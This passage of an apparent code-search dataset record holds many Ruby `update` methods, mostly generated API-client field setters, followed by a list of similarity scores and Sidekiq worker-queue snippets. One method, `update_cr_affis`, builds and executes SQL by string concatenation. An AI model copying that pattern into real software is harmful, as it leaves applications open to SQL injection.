args[:repository_webref_reconcile_response] if args.key?(:repository_webref_reconcile_response)\n @repository_webref_refcon_juggler_reference_page_mappings = args[:repository_webref_refcon_juggler_reference_page_mappings] if args.key?(:repository_webref_refcon_juggler_reference_page_mappings)\n @repository_webref_reference_pages_classifier_scored_page = 
args[:repository_webref_reference_pages_classifier_scored_page] if args.key?(:repository_webref_reference_pages_classifier_scored_page)\n @repository_webref_salient_entity_set = args[:repository_webref_salient_entity_set] if args.key?(:repository_webref_salient_entity_set)\n @repository_webref_undermerged_entities = args[:repository_webref_undermerged_entities] if args.key?(:repository_webref_undermerged_entities)\n @repository_webref_universal_embedding_retrieval_debug = args[:repository_webref_universal_embedding_retrieval_debug] if args.key?(:repository_webref_universal_embedding_retrieval_debug)\n @repository_webref_webit_intermediary_mids = args[:repository_webref_webit_intermediary_mids] if args.key?(:repository_webref_webit_intermediary_mids)\n @repository_webref_webit_scope_fprint = args[:repository_webref_webit_scope_fprint] if args.key?(:repository_webref_webit_scope_fprint)\n @repository_webref_webit_scope_signals = args[:repository_webref_webit_scope_signals] if args.key?(:repository_webref_webit_scope_signals)\n @repository_webref_webit_triple_signals = args[:repository_webref_webit_triple_signals] if args.key?(:repository_webref_webit_triple_signals)\n @repository_webref_webref_entities = args[:repository_webref_webref_entities] if args.key?(:repository_webref_webref_entities)\n @repository_webref_webref_status = args[:repository_webref_webref_status] if args.key?(:repository_webref_webref_status)\n @repository_webtables_data_table_annotations = args[:repository_webtables_data_table_annotations] if args.key?(:repository_webtables_data_table_annotations)\n @repository_webtables_data_table_mid_annotation = args[:repository_webtables_data_table_mid_annotation] if args.key?(:repository_webtables_data_table_mid_annotation)\n @repository_webtables_translation_message = args[:repository_webtables_translation_message] if args.key?(:repository_webtables_translation_message)\n @repository_wikipedia_alias_list = args[:repository_wikipedia_alias_list] if args.key?(:repository_wikipedia_alias_list)\n @repository_wikipedia_annotator_wikipedia_page_component_annotations = args[:repository_wikipedia_annotator_wikipedia_page_component_annotations] if args.key?(:repository_wikipedia_annotator_wikipedia_page_component_annotations)\n @repository_wikipedia_sentence_compression_annotation = args[:repository_wikipedia_sentence_compression_annotation] if args.key?(:repository_wikipedia_sentence_compression_annotation)\n @repository_wikipedia_wiki_join = args[:repository_wikipedia_wiki_join] if args.key?(:repository_wikipedia_wiki_join)\n @repository_wikipedia_wiki_mapper_triple_set = args[:repository_wikipedia_wiki_mapper_triple_set] if args.key?(:repository_wikipedia_wiki_mapper_triple_set)\n @repository_wikipedia_wikibase_entity = args[:repository_wikipedia_wikibase_entity] if args.key?(:repository_wikipedia_wikibase_entity)\n @repository_wikipedia_wikidata_org_triple_set = args[:repository_wikipedia_wikidata_org_triple_set] if args.key?(:repository_wikipedia_wikidata_org_triple_set)\n @repository_wikipedia_wikitrust_wiki_trust_info = args[:repository_wikipedia_wikitrust_wiki_trust_info] if args.key?(:repository_wikipedia_wikitrust_wiki_trust_info)\n @research_coauthor_opinion_annotations = args[:research_coauthor_opinion_annotations] if args.key?(:research_coauthor_opinion_annotations)\n @research_structured_data_inadvertent_anchor_score_annotation = args[:research_structured_data_inadvertent_anchor_score_annotation] if args.key?(:research_structured_data_inadvertent_anchor_score_annotation)\n 
@research_structured_data_knowledge_exploration_annotations = args[:research_structured_data_knowledge_exploration_annotations] if args.key?(:research_structured_data_knowledge_exploration_annotations)\n @research_structured_data_news_embedding_annotations = args[:research_structured_data_news_embedding_annotations] if args.key?(:research_structured_data_news_embedding_annotations)\n @richsnippets_data_object = args[:richsnippets_data_object] if args.key?(:richsnippets_data_object)\n @richsnippets_feed_page_map = args[:richsnippets_feed_page_map] if args.key?(:richsnippets_feed_page_map)\n @richsnippets_page_map = args[:richsnippets_page_map] if args.key?(:richsnippets_page_map)\n @richsnippets_page_map_annotations = args[:richsnippets_page_map_annotations] if args.key?(:richsnippets_page_map_annotations)\n @richsnippets_schema_thing = args[:richsnippets_schema_thing] if args.key?(:richsnippets_schema_thing)\n @rosetta_language = args[:rosetta_language] if args.key?(:rosetta_language)\n @safesearch_page_classifier_output = args[:safesearch_page_classifier_output] if args.key?(:safesearch_page_classifier_output)\n @safesearch_safe_search_internal_page_signals = args[:safesearch_safe_search_internal_page_signals] if args.key?(:safesearch_safe_search_internal_page_signals)\n @science_index_signal = args[:science_index_signal] if args.key?(:science_index_signal)\n @search_engagement_highlight_shared_highlight_signal = args[:search_engagement_highlight_shared_highlight_signal] if args.key?(:search_engagement_highlight_shared_highlight_signal)\n @searchar_search_ar_pipeline_signal = args[:searchar_search_ar_pipeline_signal] if args.key?(:searchar_search_ar_pipeline_signal)\n @shopping_quality_shopping_site_classifier = args[:shopping_quality_shopping_site_classifier] if args.key?(:shopping_quality_shopping_site_classifier)\n @shopping_quality_shopping_site_classifier_shopfab = args[:shopping_quality_shopping_site_classifier_shopfab] if args.key?(:shopping_quality_shopping_site_classifier_shopfab)\n @shopping_webentity_shopping_annotation = args[:shopping_webentity_shopping_annotation] if args.key?(:shopping_webentity_shopping_annotation)\n @sitemaps_sitemaps_signals = args[:sitemaps_sitemaps_signals] if args.key?(:sitemaps_sitemaps_signals)\n @smearing_smeared_terms = args[:smearing_smeared_terms] if args.key?(:smearing_smeared_terms)\n @social_personalization_knex_annotation = args[:social_personalization_knex_annotation] if args.key?(:social_personalization_knex_annotation)\n @spam_brain_spam_brain_data = args[:spam_brain_spam_brain_data] if args.key?(:spam_brain_spam_brain_data)\n @spam_brain_spam_brain_page_classifier_annotation = args[:spam_brain_spam_brain_page_classifier_annotation] if args.key?(:spam_brain_spam_brain_page_classifier_annotation)\n @spam_content_anchor_dist = args[:spam_content_anchor_dist] if args.key?(:spam_content_anchor_dist)\n @spam_content_authentic_authentic_text_annotation = args[:spam_content_authentic_authentic_text_annotation] if args.key?(:spam_content_authentic_authentic_text_annotation)\n @spam_content_image_map_pb = args[:spam_content_image_map_pb] if args.key?(:spam_content_image_map_pb)\n @spam_content_site_age_stats = args[:spam_content_site_age_stats] if args.key?(:spam_content_site_age_stats)\n @spam_cookbook_cookbook_annotations = args[:spam_cookbook_cookbook_annotations] if args.key?(:spam_cookbook_cookbook_annotations)\n @spam_cookbook_cookbook_sitechunk_annotations = args[:spam_cookbook_cookbook_sitechunk_annotations] if 
args.key?(:spam_cookbook_cookbook_sitechunk_annotations)\n @spam_fatping_index_feed = args[:spam_fatping_index_feed] if args.key?(:spam_fatping_index_feed)\n @spam_godcluster_aff_id_annotation = args[:spam_godcluster_aff_id_annotation] if args.key?(:spam_godcluster_aff_id_annotation)\n @spam_godcluster_server_header_annotation = args[:spam_godcluster_server_header_annotation] if args.key?(:spam_godcluster_server_header_annotation)\n @spam_googlebombs_googlebombs_annotation = args[:spam_googlebombs_googlebombs_annotation] if args.key?(:spam_googlebombs_googlebombs_annotation)\n @spam_hacked_sites_doc_spam_info = args[:spam_hacked_sites_doc_spam_info] if args.key?(:spam_hacked_sites_doc_spam_info)\n @spam_hacked_sites_gpgb_gpgb_ngram_stats = args[:spam_hacked_sites_gpgb_gpgb_ngram_stats] if args.key?(:spam_hacked_sites_gpgb_gpgb_ngram_stats)\n @spam_hacked_sites_word_frequencies = args[:spam_hacked_sites_word_frequencies] if args.key?(:spam_hacked_sites_word_frequencies)\n @spam_js_js_info = args[:spam_js_js_info] if args.key?(:spam_js_js_info)\n @spam_scam_scamness = args[:spam_scam_scamness] if args.key?(:spam_scam_scamness)\n @spam_scam_unauthoritative_site = args[:spam_scam_unauthoritative_site] if args.key?(:spam_scam_unauthoritative_site)\n @spam_tokens_spam_tokens_annotation = args[:spam_tokens_spam_tokens_annotation] if args.key?(:spam_tokens_spam_tokens_annotation)\n @table_talk_stride_offer_page_price_annotation = args[:table_talk_stride_offer_page_price_annotation] if args.key?(:table_talk_stride_offer_page_price_annotation)\n @tasks_taba_taba_doc_signals = args[:tasks_taba_taba_doc_signals] if args.key?(:tasks_taba_taba_doc_signals)\n @telephone_number_annotations = args[:telephone_number_annotations] if args.key?(:telephone_number_annotations)\n @time_annotation_tags = args[:time_annotation_tags] if args.key?(:time_annotation_tags)\n @time_annotations = args[:time_annotations] if args.key?(:time_annotations)\n @time_range_annotations = args[:time_range_annotations] if args.key?(:time_range_annotations)\n @travel_assistant_travel_doc_classification = args[:travel_assistant_travel_doc_classification] if args.key?(:travel_assistant_travel_doc_classification)\n @ucp_signal = args[:ucp_signal] if args.key?(:ucp_signal)\n @udr_converter_document_shopping_data = args[:udr_converter_document_shopping_data] if args.key?(:udr_converter_document_shopping_data)\n @udr_converter_offer = args[:udr_converter_offer] if args.key?(:udr_converter_offer)\n @udr_converter_product_block_data = args[:udr_converter_product_block_data] if args.key?(:udr_converter_product_block_data)\n @udr_proto_detailed_entity_scores = args[:udr_proto_detailed_entity_scores] if args.key?(:udr_proto_detailed_entity_scores)\n @udr_proto_overlay = args[:udr_proto_overlay] if args.key?(:udr_proto_overlay)\n @udr_proto_webref_mention = args[:udr_proto_webref_mention] if args.key?(:udr_proto_webref_mention)\n @universal_facts = args[:universal_facts] if args.key?(:universal_facts)\n @unwanted_image_data_list = args[:unwanted_image_data_list] if args.key?(:unwanted_image_data_list)\n @uri_annotations = args[:uri_annotations] if args.key?(:uri_annotations)\n @util_status_proto = args[:util_status_proto] if args.key?(:util_status_proto)\n @verticals_discussion_discussion_annotation_tag = args[:verticals_discussion_discussion_annotation_tag] if args.key?(:verticals_discussion_discussion_annotation_tag)\n @video_crawl_automated_audio_extraction_signals = args[:video_crawl_automated_audio_extraction_signals] if 
args.key?(:video_crawl_automated_audio_extraction_signals)\n @video_crawl_automated_extraction_signals = args[:video_crawl_automated_extraction_signals] if args.key?(:video_crawl_automated_extraction_signals)\n @video_crawl_domain_video_click_data = args[:video_crawl_domain_video_click_data] if args.key?(:video_crawl_domain_video_click_data)\n @video_crawl_video_click_data = args[:video_crawl_video_click_data] if args.key?(:video_crawl_video_click_data)\n @video_crawl_video_salient_term_set = args[:video_crawl_video_salient_term_set] if args.key?(:video_crawl_video_salient_term_set)\n @video_crawl_video_scoring_signals = args[:video_crawl_video_scoring_signals] if args.key?(:video_crawl_video_scoring_signals)\n @video_crawl_watch_page_pattern_classification = args[:video_crawl_watch_page_pattern_classification] if args.key?(:video_crawl_watch_page_pattern_classification)\n @video_crawl_youtube_embed_signal = args[:video_crawl_youtube_embed_signal] if args.key?(:video_crawl_youtube_embed_signal)\n @video_scoring_signal = args[:video_scoring_signal] if args.key?(:video_scoring_signal)\n @video_web_gallery = args[:video_web_gallery] if args.key?(:video_web_gallery)\n @video_youtube_live_cardio_cardio_stats = args[:video_youtube_live_cardio_cardio_stats] if args.key?(:video_youtube_live_cardio_cardio_stats)\n @volt = args[:volt] if args.key?(:volt)\n @watchpage_language_watch_page_language_result = args[:watchpage_language_watch_page_language_result] if args.key?(:watchpage_language_watch_page_language_result)\n @websitetools_feeds_annotations_feed_content_annotations = args[:websitetools_feeds_annotations_feed_content_annotations] if args.key?(:websitetools_feeds_annotations_feed_content_annotations)\n @websitetools_feeds_linked_feed_linked_feed = args[:websitetools_feeds_linked_feed_linked_feed] if args.key?(:websitetools_feeds_linked_feed_linked_feed)\n @websitetools_feeds_podcast_podcast_signals = args[:websitetools_feeds_podcast_podcast_signals] if args.key?(:websitetools_feeds_podcast_podcast_signals)\n @websitetools_feeds_spore_feeds_spore_triples = args[:websitetools_feeds_spore_feeds_spore_triples] if args.key?(:websitetools_feeds_spore_feeds_spore_triples)\n @whatshapp_stride_extractions = args[:whatshapp_stride_extractions] if args.key?(:whatshapp_stride_extractions)\n @youtube_alexandria_youtube_body = args[:youtube_alexandria_youtube_body] if args.key?(:youtube_alexandria_youtube_body)\n @youtube_alexandria_youtube_signal = args[:youtube_alexandria_youtube_signal] if args.key?(:youtube_alexandria_youtube_signal)\n end",
"def update!(**args)\n @box = args[:box] if args.key?(:box)\n @letters_count = args[:letters_count] if args.key?(:letters_count)\n end",
"def update(text); end",
"def update!(**args)\n @replace_message_fields = args[:replace_message_fields] if args.key?(:replace_message_fields)\n @replace_repeated_fields = args[:replace_repeated_fields] if args.key?(:replace_repeated_fields)\n end",
"def update!(**args)\n @compound_code = args[:compound_code] if args.key?(:compound_code)\n @global_code = args[:global_code] if args.key?(:global_code)\n end",
"def update!(**args)\n @compressed_salience = args[:compressed_salience] if args.key?(:compressed_salience)\n @country_code = args[:country_code] if args.key?(:country_code)\n @salience = args[:salience] if args.key?(:salience)\n end",
"def update!(**args)\n @annotations = args[:annotations] if args.key?(:annotations)\n @line_item_id = args[:line_item_id] if args.key?(:line_item_id)\n @product_id = args[:product_id] if args.key?(:product_id)\n end",
"def update!(**args)\n @gcid_intent = args[:gcid_intent] if args.key?(:gcid_intent)\n @salient_term_set = args[:salient_term_set] if args.key?(:salient_term_set)\n end",
"def update(...)\n end",
"def update_cr_affis(affi_lines)\n db = get_db()\n affi_lines.each do |cr_affi|\n cr_affi_id = cr_affi[0]\n cr_affi_name = cr_affi[1]\n sql_cmd = \"\"\n # puts \"\\n££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n # print \"\\naffiliation STRING: \" + cr_affi_name\n # puts \"\\n££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n if cr_affi_name.include?(\"\\n\") then\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n sql_cmd = \"UPDATE cr_affiliations SET name =\\\"\" + cr_affi_name.gsub(\"\\n\", \" \") + \"\\\" WHERE id = \" + cr_affi_id.to_s + \";\"\n puts sql_cmd\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n end\n if cr_affi_name.include?(\"\\r\") then\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n sql_cmd = \"UPDATE cr_affiliations SET name =\\\"\" + cr_affi_name.gsub(\"\\r\", \" \") + \"\\\" WHERE id = \" + cr_affi_id.to_s + \";\"\n puts sql_cmd\n puts \"££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££££\"\n end\n if sql_cmd != \"\" then db.execute(sql_cmd) end\n end\nend",
"def update\n megam_rest.update_quotas(to_hash)\n end",
"def update!(**args)\n @barcode = args[:barcode] if args.key?(:barcode)\n @layout = args[:layout] if args.key?(:layout)\n end",
"def update!(**args)\n @intent_id = args[:intent_id] if args.key?(:intent_id)\n @slot_name = args[:slot_name] if args.key?(:slot_name)\n end",
"def update!(**args)\n @material = args[:material] if args.key?(:material)\n @text = args[:text] if args.key?(:text)\n end",
"def update!(**args)\n @idf = args[:idf] if args.key?(:idf)\n @plural_prob = args[:plural_prob] if args.key?(:plural_prob)\n end",
"def update!(**args)\n @ad_code = args[:ad_code] if args.key?(:ad_code)\n @amp_body = args[:amp_body] if args.key?(:amp_body)\n @amp_head = args[:amp_head] if args.key?(:amp_head)\n end",
"def update!(**args)\n @amarna_docid = args[:amarna_docid] if args.key?(:amarna_docid)\n @asr_repair = args[:asr_repair] if args.key?(:asr_repair)\n @lang = args[:lang] if args.key?(:lang)\n @punctuated_transcript = args[:punctuated_transcript] if args.key?(:punctuated_transcript)\n @saft_document = args[:saft_document] if args.key?(:saft_document)\n @saft_sentence_boundary = args[:saft_sentence_boundary] if args.key?(:saft_sentence_boundary)\n @timing_info = args[:timing_info] if args.key?(:timing_info)\n @webref_entities = args[:webref_entities] if args.key?(:webref_entities)\n end",
"def update!(**args)\n @dependency_edge = args[:dependency_edge] if args.key?(:dependency_edge)\n @lemma = args[:lemma] if args.key?(:lemma)\n @part_of_speech = args[:part_of_speech] if args.key?(:part_of_speech)\n @text = args[:text] if args.key?(:text)\n end",
"def update!(**args)\n @asr_mention_text = args[:asr_mention_text] if args.key?(:asr_mention_text)\n @asr_mention_transcript_offset = args[:asr_mention_transcript_offset] if args.key?(:asr_mention_transcript_offset)\n @asr_sentence = args[:asr_sentence] if args.key?(:asr_sentence)\n @asr_start_time = args[:asr_start_time] if args.key?(:asr_start_time)\n @bert_scores = args[:bert_scores] if args.key?(:bert_scores)\n @broadness = args[:broadness] if args.key?(:broadness)\n @duration_coverage = args[:duration_coverage] if args.key?(:duration_coverage)\n @entity_connectedness = args[:entity_connectedness] if args.key?(:entity_connectedness)\n @entity_description = args[:entity_description] if args.key?(:entity_description)\n @entity_info = args[:entity_info] if args.key?(:entity_info)\n @entity_mention_in_description = args[:entity_mention_in_description] if args.key?(:entity_mention_in_description)\n @estimated_mention_time = args[:estimated_mention_time] if args.key?(:estimated_mention_time)\n @group_cohesion = args[:group_cohesion] if args.key?(:group_cohesion)\n @hypernym_confidence = args[:hypernym_confidence] if args.key?(:hypernym_confidence)\n @hypernym_count = args[:hypernym_count] if args.key?(:hypernym_count)\n @hyperpedia_salient_terms_similarity = args[:hyperpedia_salient_terms_similarity] if args.key?(:hyperpedia_salient_terms_similarity)\n @in_webref_entities = args[:in_webref_entities] if args.key?(:in_webref_entities)\n @is_oracle_entity = args[:is_oracle_entity] if args.key?(:is_oracle_entity)\n @is_product = args[:is_product] if args.key?(:is_product)\n @max_mention_confidence = args[:max_mention_confidence] if args.key?(:max_mention_confidence)\n @mention_confidence = args[:mention_confidence] if args.key?(:mention_confidence)\n @mentions = args[:mentions] if args.key?(:mentions)\n @ms_from_last_anchor = args[:ms_from_last_anchor] if args.key?(:ms_from_last_anchor)\n @next_asr_sentence = args[:next_asr_sentence] if args.key?(:next_asr_sentence)\n @other_asr_mention_text = args[:other_asr_mention_text] if args.key?(:other_asr_mention_text)\n @other_estimated_mention_times = args[:other_estimated_mention_times] if args.key?(:other_estimated_mention_times)\n @previous_asr_sentence = args[:previous_asr_sentence] if args.key?(:previous_asr_sentence)\n @trusted_name_confidence = args[:trusted_name_confidence] if args.key?(:trusted_name_confidence)\n @webref_entity_topicality = args[:webref_entity_topicality] if args.key?(:webref_entity_topicality)\n end",
"def update!(**args)\n @csai = args[:csai] if args.key?(:csai)\n @fringe = args[:fringe] if args.key?(:fringe)\n @medical = args[:medical] if args.key?(:medical)\n @minor = args[:minor] if args.key?(:minor)\n @offensive = args[:offensive] if args.key?(:offensive)\n @porn = args[:porn] if args.key?(:porn)\n @spoof = args[:spoof] if args.key?(:spoof)\n @violence = args[:violence] if args.key?(:violence)\n @vulgar = args[:vulgar] if args.key?(:vulgar)\n end",
"def update!(**args)\n @line_concept = args[:line_concept] if args.key?(:line_concept)\n @stops = args[:stops] if args.key?(:stops)\n end",
"def message_update_processing\n Graphics.update\n $scene&.update\n end",
"def update_ape\n entries = fields.values.collect{|value| value.raw}.sort{|a,b| x = a.length <=> b.length; x != 0 ? x : a <=> b}\n @tag_data = entries.join\n @tag_item_count = entries.length\n @tag_size = tag_data.length + 64\n base_start = \"#{PREAMBLE}#{[tag_size-32, tag_item_count].pack('VV')}\"\n base_end = \"\\0\"*8\n @tag_header = \"#{base_start}\\x00#{HEADER_FLAGS}#{base_end}\"\n @tag_footer = \"#{base_start}\\x00#{FOOTER_FLAGS}#{base_end}\"\n raise ApeTagError, \"Updated tag has too many items (#{tag_item_count})\" if tag_item_count > MAX_ITEM_COUNT\n raise ApeTagError, \"Updated tag too large (#{tag_size})\" if tag_size > MAX_SIZE\n end",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @new_music = args[:new_music] if args.key?(:new_music)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n @type = args[:type] if args.key?(:type)\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_final = args[:is_final] if args.key?(:is_final)\n @message_type = args[:message_type] if args.key?(:message_type)\n @transcript = args[:transcript] if args.key?(:transcript)\n end",
"def update!(**args)\n @provenance = args[:provenance] if args.key?(:provenance)\n end",
"def update\n\t\t\n\t\tend",
"def update_item\n pcp_item.update_new_assmt( self )\n end",
"def update \n end",
"def update!(**args)\n @additional_phones = args[:additional_phones] if args.key?(:additional_phones)\n @primary_phone = args[:primary_phone] if args.key?(:primary_phone)\n end",
"def update(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_alpha, updated_beta, _) = _updated_annotator(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_mu_winner, updated_mu_loser) = _updated_mus(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t (updated_sigma_sq_winner, updated_sigma_sq_loser) = _updated_sigma_sqs(alpha, beta, mu_winner, sigma_sq_winner, mu_loser, sigma_sq_loser)\n\t \n\t [updated_alpha, updated_beta, updated_mu_winner, updated_sigma_sq_winner, updated_mu_loser, updated_sigma_sq_loser]\n\tend",
"def update!(**args)\n @alias = args[:alias] if args.key?(:alias)\n @canonical = args[:canonical] if args.key?(:canonical)\n @canonical_lexical_mid = args[:canonical_lexical_mid] if args.key?(:canonical_lexical_mid)\n end",
"def update!(**args)\n @gainmap = args[:gainmap] if args.key?(:gainmap)\n end",
"def update\n megam_rest.update_assembly(to_hash)\n end",
"def update; end",
"def update!(**args)\n @additional_fixed_point_encodings = args[:additional_fixed_point_encodings] if args.key?(:additional_fixed_point_encodings)\n @compressed_document_embedding = args[:compressed_document_embedding] if args.key?(:compressed_document_embedding)\n @fixed_point_encoding = args[:fixed_point_encoding] if args.key?(:fixed_point_encoding)\n @scaled_fixed_point4_encoding = args[:scaled_fixed_point4_encoding] if args.key?(:scaled_fixed_point4_encoding)\n @scaled_fixed_point8_encoding = args[:scaled_fixed_point8_encoding] if args.key?(:scaled_fixed_point8_encoding)\n @scaled_shifted_fixed_point4_encoding = args[:scaled_shifted_fixed_point4_encoding] if args.key?(:scaled_shifted_fixed_point4_encoding)\n @version_and_improv_info = args[:version_and_improv_info] if args.key?(:version_and_improv_info)\n end",
"def update_position(account_name, pos_id, order_qty, escrow)\n action \"set escrow for position(#{pos_id}) to #{escrow}\"\n p = get(pos_id)\n p.escrow += escrow\n p.order_qty += order_qty\n end",
"def update!(**args)\n @intent_batch_inline = args[:intent_batch_inline] if args.key?(:intent_batch_inline)\n @intent_batch_uri = args[:intent_batch_uri] if args.key?(:intent_batch_uri)\n @intent_view = args[:intent_view] if args.key?(:intent_view)\n @language_code = args[:language_code] if args.key?(:language_code)\n @update_mask = args[:update_mask] if args.key?(:update_mask)\n end",
"def update!(**args)\n @ae_origin = args[:ae_origin] if args.key?(:ae_origin)\n end",
"def update!(**args)\n @sequence_segment = args[:sequence_segment] if args.key?(:sequence_segment)\n @not = args[:not] if args.key?(:not)\n @simple_segment = args[:simple_segment] if args.key?(:simple_segment)\n end",
"def update!(**args)\n @block_type = args[:block_type] if args.key?(:block_type)\n @box = args[:box] if args.key?(:box)\n @label = args[:label] if args.key?(:label)\n @orientation_label = args[:orientation_label] if args.key?(:orientation_label)\n @paragraph = args[:paragraph] if args.key?(:paragraph)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @text_confidence = args[:text_confidence] if args.key?(:text_confidence)\n end",
"def update!(**args)\n @modifier = args[:modifier] if args.key?(:modifier)\n @number = args[:number] if args.key?(:number)\n @number_span = args[:number_span] if args.key?(:number_span)\n @symbolic_quantity = args[:symbolic_quantity] if args.key?(:symbolic_quantity)\n @unit = args[:unit] if args.key?(:unit)\n end",
"def update!(**args)\n @pin = args[:pin] if args.key?(:pin)\n end"
] |
[
"0.6658007",
"0.60036933",
"0.5710292",
"0.5695588",
"0.56829643",
"0.56478083",
"0.55922955",
"0.55900496",
"0.55402684",
"0.55304533",
"0.5515028",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.5488818",
"0.54815155",
"0.5478228",
"0.5469598",
"0.5469598",
"0.54686874",
"0.5444804",
"0.54373574",
"0.5434437",
"0.5428063",
"0.54144484",
"0.5402177",
"0.5375368",
"0.5371796",
"0.5346058",
"0.5346058",
"0.53290623",
"0.53182507",
"0.5307537",
"0.5305579",
"0.5300975",
"0.52897",
"0.5284697",
"0.52764505",
"0.5276182",
"0.5268522",
"0.5265559",
"0.52640635",
"0.526344",
"0.52554804",
"0.5255457",
"0.52546436",
"0.52449596",
"0.52440345",
"0.5242355",
"0.52416396",
"0.5240359",
"0.52372605",
"0.5236719",
"0.5232987",
"0.52327245",
"0.52277833",
"0.5217897",
"0.52166164",
"0.5215681",
"0.5214936",
"0.521189",
"0.5209815",
"0.5204973",
"0.5202862",
"0.52010965",
"0.519446",
"0.519428",
"0.5194038",
"0.5180305",
"0.51780516",
"0.5176486",
"0.51732343",
"0.51730585",
"0.51716155",
"0.51701474",
"0.5167293",
"0.5163731",
"0.5163178",
"0.51609635",
"0.51600266",
"0.51594895",
"0.5159301",
"0.515686",
"0.51554275",
"0.51533675",
"0.5153028",
"0.5152051",
"0.51509714",
"0.5146901",
"0.5146257",
"0.5144484",
"0.51434344",
"0.5135884",
"0.5134116",
"0.5133093",
"0.51307017"
] |
0.559373
|
6
|
sidekiq_options queue: "high". Changing this requires adding the matching queue config, else the worker will not start; see the documentation. sidekiq_options retry: false
|
def perform
  publish_scheduled
end
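
# A hedged sketch, not part of the original record: it shows how the advice in
# the query above could attach to this worker. The class name `PublishWorker`
# and the `publish_scheduled` stub are assumptions for illustration only.
require "sidekiq"

class PublishWorker
  include Sidekiq::Worker
  # Route jobs to the "high" queue with retries disabled, as the query asks.
  # The queue must also be declared where the Sidekiq process is configured
  # (e.g. `sidekiq -q high -q default`, or the :queues key in sidekiq.yml);
  # otherwise no worker process polls it and the job never runs, which is the
  # "shall add some config, else worker will not start" caveat in the query.
  sidekiq_options queue: "high", retry: false

  def perform
    publish_scheduled
  end

  private

  # Stub so the sketch is self-contained; the real publishing logic would
  # live elsewhere in the application.
  def publish_scheduled; end
end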
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def configure worker,worker_config\n if worker_config[\"maximum_size\"]>0\n @queues[worker]=SizedQueue.new(worker_config[\"maximum_size\"])\n else\n @queues[worker]=Queue.new\n end\n configuration(worker)\n end",
"def sidekiq_options(opts = T.unsafe(nil)); end",
"def queue_opts\n {\n :max_bytes => 50_000,\n :service => config.kafka_response_topic,\n }\n end",
"def queue(options={})\n# puts 'in queue'\n set_auto_attributes\n upload_if_needed\n\n response = SimpleWorker.service.queue(self.class.name, sw_get_data, options)\n# puts 'queue response=' + response.inspect\n# @task_set_id = response[\"task_set_id\"]\n @task_id = response[\"task_id\"]\n response\n end",
"def sidekiq?\n option?(\"sidekiq\")\n end",
"def silence_single_worker_warning; end",
"def worker_config\n worker = JSON.parse(SideJob.redis.get(\"#{redis_key}:worker\"))\n SideJob::Worker.config(worker['queue'], worker['class']) || {}\n end",
"def configuration worker\n if @queues[worker] \n @queues[worker].respond_to?(:max) ? max_size=@queues[worker].max : max_size=0\n {'worker'=>worker,'maximum_size'=>max_size}\n else\n raise InvalidData,\"non existent queue\"\n end\n end",
"def worker_timeout\n option :worker_timeout, DEFAULT_WORKER_TIMEOUT\n end",
"def set_queue_options(options = {})\n @queue_options = options\n end",
"def sidekiq_task_options(opts = {})\n @sidekiq_task_options_hash = get_sidekiq_task_options.merge((opts).symbolize_keys!)\n end",
"def queue_job; end",
"def initialize\n @queue_options = {}\n @queue_configs = []\n end",
"def default_fail_queue_target\n true\n end",
"def stompkiq_options(opts={})\n self.stompkiq_options_hash = get_stompkiq_options.merge(symbolize_keys(opts || {}))\n end",
"def default_fail_queue_target\n false\n end",
"def job_options\n end",
"def config(queue, klass)\n config = SideJob.redis.hget \"workers:#{queue}\", klass\n config = JSON.parse(config) if config\n config\n end",
"def call(worker, msg, queue, redis = ::Sidekiq.method(:redis))\n working!(queue, redis)\n yield\n ensure\n working!(queue, redis)\n wait_for_task_or_scale(redis)\n end",
"def default_fail_queue_target\n true\n end",
"def sidekiq_queue(time=nil)\n # Don't need to queue if a worker is already in process of running\n return if SideJob.redis.exists \"#{redis_key}:lock:worker\"\n\n worker = JSON.parse(SideJob.redis.get(\"#{redis_key}:worker\"))\n # Don't need to queue if the job is already in the queue (this does not include scheduled jobs)\n # When Sidekiq pulls job out from scheduled set, we can still get the same job queued multiple times\n # but the server middleware handles it\n return if Sidekiq::Queue.new(worker['queue']).find_job(@id)\n\n if ! SideJob::Worker.config(worker['queue'], worker['class'])\n self.status = 'terminated'\n raise \"Worker no longer registered for #{klass} in queue #{worker['queue']}\"\n end\n item = {'jid' => id, 'queue' => worker['queue'], 'class' => worker['class'], 'args' => worker['args'] || [], 'retry' => false}\n item['at'] = time if time && time > Time.now.to_f\n Sidekiq::Client.push(item)\n end",
"def worker_initial_config\n\n end",
"def worker_queue\n PingWorker.perform_async(self.id)\n end",
"def requeue_perform_delay\n 1.0\n end",
"def requeue_perform_delay\n 1.0\n end",
"def worker_key; worker_options && worker_options[:worker_key]; end",
